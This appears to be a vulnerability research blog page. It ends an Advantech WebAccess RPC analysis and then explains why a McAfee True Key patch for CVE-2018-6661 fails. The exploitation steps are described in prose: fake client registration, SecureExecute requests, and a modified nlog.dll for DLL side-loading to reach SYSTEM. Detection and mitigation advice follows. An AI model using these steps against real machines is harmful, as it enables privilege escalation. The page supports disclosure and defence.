Interestingly, the value on which the comparison is being performed comes from a different request and not the 0x2711 IOCTL request itself. This other request based on RPC opcode 0x4 has been described in detail by previous research such as ZDI’s. Instead of repeating the same analysis, it would suffice to say that the value being compared results from the connType value supplied as part of the request, as can be seen in the listing of opcode 0x4 as shown below.
As a result, an attacker can target the vulnerable code in both binaries just by changing the connType value as can be seen in the Metasploit code shown below.
While reviewing other publically documented RPC vulnerabilities in Advantech WebAccess, we discovered that the usual trend was to trigger the vulnerability using one specific RPC opcode, while in reality it could triggered using multiple opcodes. This doesn’t bode well for defenders as an attacker could trigger the same vulnerability using a different opcode and thereby bypass the signature meant to trigger on a specific opcode request.
The arbitrary command execution vulnerability in 0x2711 IOCTL is also reachable over opcode 0x0, in addition to opcode 0x1 as shown in earlier code. The modified code to trigger it using opcode 0x0 is shown below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
# Triggering CreateProcessA() in viewsrv.dll using opcode 0x0
Users of Advantech WebAccess are advised to set a Remote Access Code during the installation to protect the RPC service from unauthorized requests. The screen for setting up the code is outlined below.
Additionally, users can setup a remote access code per project as shown below.
Conclusion
It should be apparent by now that keeping up-to-date on patches from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch and analyse it to know if it actually fixed the vulnerability it was supposed to patch. Furthermore, all paths leading up to the vulnerable code need to be analysed in order for companies to provide complete detection for a vulnerability.
The information mentioned in this blogpost has been available to our N-day feed subscribers since January 2018 when the first public advisory about the vulnerability was released. It has enabled them to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor and the lack of correct information in public advisories.
In this blog post, we examine the vendor-supplied patch addressing CVE-2018-6661. The vulnerability was initially reported to Intel Security (McAfee) in June 2017 and disclosed publicly in April 2018. Additionally, we contacted McAfee regarding the issues discussed in this post in August 2018.
Contributors: Omar El-Domeiri and Gaurav Baruah
At Exodus, we often encounter failed patches or discover adjacent zero-day vulnerabilities while conducting n-day vulnerability research. In 2018, our team has identified 24 publicly disclosed vulnerabilities that were reportedly patched but, in fact, were still vulnerable because the patch did not address the root cause. Failed patches can leave users at risk even if they vigilantly keep up with software updates and security advisories.
There are many reasons why a vendor-supplied patch may fail to improve the security of the software. In some instances, a patch may actually increase the attack surface and consequently introduce new vulnerabilities. While in other instances, a patch may be incomplete, leaving avenues by which the patch can be bypassed and the vulnerable code triggered. Often incomplete patches are the result of a vendor specifically patching for the PoC they receive from disclosure without addressing the root cause. In the case of CVE-2018-6661, we discovered an incomplete patch that left multiple ways for attackers to bypass the patch.
Summary
A publicly disclosed vulnerability for the Intel Security (McAfee) True Key software remains exploitable despite multiple vendor-supplied patches. Any logged in user, including the Guest account, can send a series of crafted requests to the True Key service to execute arbitrary code via a DLL-side loading attack vector. As a result, unprivileged users can escalate privileges to NT AUTHORITY\SYSTEM on any Windows machine with True Key installed.
Background
True Key is a password manager supporting several methods of sign-in including face and fingerprint, email, master password or by using a trusted device. It is freely available for Windows, Mac OS X, Android and iOS devices but requires a subscription to store more than 15 passwords. Until recently, True Key was bundled with Adobe Flash and required users to opt-out during installation.
When True Key is installed on Windows it includes an always running service that listens on TCP port 30,000 on the loopback interface 127.0.0.1 which runs with SYSTEM privileges. The service coordinates functionality across various components of the True Key software by providing RPC mechanisms. In the case of this vulnerability, we are interested specifically in the SecureExecute RPC method which launches executables trusted by McAfee where trust is verified by digital signature.
Patch
By examining the vendor’s patch, we can see that the patch only addresses the problem within the McAfee.TrueKey.Sync.exe and only for one of its DLL dependencies, namely the McAfee.TrueKey.SDKLibAdapter import.When the program is run, the dot net runtime will dynamically load DLL dependencies required by the program. We can identify the direct dependencies by the imports at the top. Since Windows searches for DLLs in a specified order outlined in Microsoft’s documentation it is possible to provide a modified DLL within the same folder so that it will be imported. It should be noted that System imports are contained in the known DLLs list and can not be used in this way by an attacker.
The patch enforces that the SDKLibAdapter library must be found in the C:\Program Files\TrueKey folder (C:\Program Files\McAfee\TrueKey in more recent versions) which can not be written to by an unprivileged user. However, the binary also imports the NLog logging library and does not enforce a path constraint for the corresponding DLL. The patch is incomplete because it overlooks this and hence the nlog.dll can be utilized to allow arbitrary code execution just as the McAfee.TrueKey.SDKLibAdapter.dll could be used in versions prior to the patch. Furthermore, any other McAfee signed binary can be used to exploit the vulnerability as long as the binary depends on a DLL outside the list of known DLLs. There are multiple ways to go about finding DLL dependencies.
Reversing True Key
Upon inspection of the decompiled TrueKey service binary, it is clear that it is an Apache Thrift based service.
Thrift is a software library and set of code-generation tools developed at Facebook to expedite development and implementation of efficient and scalable backend services. Its primary goal is to enable efficient and reliable communication across programming languages by abstracting the portions of each language that tend to require the most customization into a common library that is implemented in each language. Specifically, Thrift allows developers to define datatypes and service interfaces in a single language-neutral file and generate all the necessary code to build RPC clients and servers.
Examining the code auto-generated by thrift for the SecureExecute command, we can gather the data types expected for such a request to the service.From this code, we can create our own thrift file for the subset of the RPC service that is necessary for exploitation.
The SecureExecute method takes two parameters — a 32-bit integer clientId and a string specifying the path to an executable file to run. Before executing a RPC request, the service verifies that the clientId matches a known value that it has issued previously.
The handler for the SecureExecute API request will create a SecureExecuteCommand object, wrap it in a CheckedCommand object and pass it to the runner.Sync() method which will call the CheckedCommand object’s Execute() method. CheckedCommand verifies that the clientId supplied in the request matches an existing ClientId that the service has already issued. If so, then it calls the Execute() method of the wrapped object which in this instance is a SecureExecuteCommand object.
SecureExecuteCommand.Execute() will inspect the requested executable to ensure that the file has been digitally signed by McAfee before spawning a child process running the executable.
So in order to get the service to actually execute a binary, we must provide it with a valid clientId and the binary must be signed by McAfee. ClientIds are issued via the RegisterClient method whose sole parameter consists of a YAPClient struct that can contain any number of optional fields. On registration, the service verifies that the client is a trusted client by checking the port field from the YAPClient struct. The port field is used to find the corresponding PID listening on that port and then the service checks that the executable associated with that PID has been digitally signed by McAfee.
Exploitation
In order to exploit the vulnerability, we will need to send a SecureExecute request to the True Key service requesting that it execute the McAfee.TrueKey.Sync.exe in a folder that contains a modified nlog.dll. There are multiple utilities available, such as dnSpy, for modifying a compiled dot net executable or DLL directly. Since the McAfee.TrueKey.Sync.exe calls the GetCurrentClassLogger() method, we modified this method to launch a child process that executes a file containing our payload within the same folder.
The exploit will function as intended even though our modifications do not adhere to the method’s type signature. The return value of Process.Start() is not a Logger object and any further use of the value returned from this method will likely throw an error, but once this code has executed we can utilize the child process running our payload to gain escalated privileges.
Initially, we send a RegisterClient request to the True Key service to get a valid clientId. Since we know that the service itself listens on port 30,000, our RegisterClient request will specify that value for the port field in the YAPClient struct. In effect, the service will verify that it trusts itself as a valid client and respond with a new clientId.
With a valid clientId in hand, we send a SecureExecute request with that clientId and an executablePath pointing to our copy of the McAfee.TrueKey.Sync.exe within a folder containing our modified nlog.dll. The dot net runtime will load our modified nlog.dll and when the GetCurrentClassLogger() method is called our pop.exe payload will be executed.
We’ve written the exploit as a metasploit module and here is a demonstration:
Detection
Active exploitation can be detected by inspecting loopback traffic to port 30,000 for SecureExecute requests where the executablePath parameter does not start with the C:\Program Files\McAfee\TrueKey prefix.
Mitigation
Microsoft has an informative article on the topic of Dynamic-Link Library Security with recommendations for how developers can safeguard their applications against this kind of attack. At the application level, the SecureExecute method should reject any requests where the executablePath does not begin with a prefix to a known write-protected folder such as C:\Program Files\McAfee\TrueKey. Additionally, the RegisterClient method should treat the port specified in the request as untrusted user input and verify the client in a more secure manner. If your organization does not rely on True Key then uninstalling this software will remove the vulnerable service.
About Exodus Intelligence N-Day Subscription Offering
In addition to internally discovered zero-day vulnerabilities, Exodus Intelligence also offers a feed comprised of threats that have been publicly disclosed by outside organizations or the vendors themselves. Subscribers of our n-day offering gain access to a collection of vetted, reliable exploits and corresponding documentation enabling them to ensure their defensive measures have been implemented properly. This is critically important in cases where the vendor-supplied patch fails to address the root cause, since the existence of a patch may falsely assure users they are no longer at risk.
Disclosure
We disclosed the failed patch to McAfee and they published an update in response. However, we tested the latest version available (5.1.173.1 as of September 7th, 2018) and found that it remains vulnerable requiring no changes to our exploit.